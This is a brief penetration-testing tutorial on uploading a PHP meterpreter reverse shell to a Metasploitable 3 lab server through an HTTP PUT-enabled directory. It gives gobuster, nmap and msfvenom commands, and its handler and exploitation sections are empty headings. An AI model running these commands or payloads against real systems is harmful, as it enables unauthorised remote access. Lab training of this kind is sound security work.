Web Exploit – HTTP-PUT


In this tutorial, we will be exploiting the HTTP put method for uploading a malicious PHP file for creating a meterpreter reverse shell.

The system we will be Metasploitable 3 and the port is 8585 HTTP server.

Directory Enumeration

First, let’s run a gobuster scan on port 8585 to find any directories that may be vulnerable.

gobuster -u http://192.168.2.66:8585 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -t 40

HTTP Methods

Now that we have a list of directories lets start with nmap script http-methods to see the HTTP methods for this directory.

nmap -p 8585 -sV –script http-methods,http-trace –script-args http-methods.test-all=true,http-methods.url-path=’/uploads/’ 192.168.2.66

Payload build – MSFVenom

The “uploads” directory is vulnerable to http-put let’s build a PHP payload using MSFVenom.

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.2.60 lport=4444 -f raw > phpexploit.php

NMAP HTTP-PUT

nmap -script http-put –script-args http-put.url=’/uploads/shell.php’,http-put.file=’/root/phpexploit.php’ -p 8585 192.168.2.66 -sV

Metasploit handler


Exploitation